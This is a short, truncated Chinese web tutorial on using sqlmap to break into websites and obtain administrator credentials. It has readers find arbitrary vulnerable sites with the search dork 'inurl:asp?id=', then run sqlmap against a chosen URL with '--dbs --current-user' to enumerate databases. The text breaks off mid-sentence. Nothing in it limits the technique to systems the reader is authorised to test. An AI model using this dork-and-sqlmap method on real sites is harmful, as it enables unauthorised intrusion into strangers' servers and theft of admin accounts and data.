sqlmap+nikto進行滲透測試獲取管理員賬號密碼操作實例

首先,在百度搜索輸入框輸入:inurl:asp?id=,在搜索列表中選擇連接類似如下的url:http://域名/about.asp?id=325。 其次,打開BT5,打開sqlmap,執行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,執行命令如下截圖: 該命令是獲取web服務操作系統、web應用服務
相關文章
相關標籤/搜索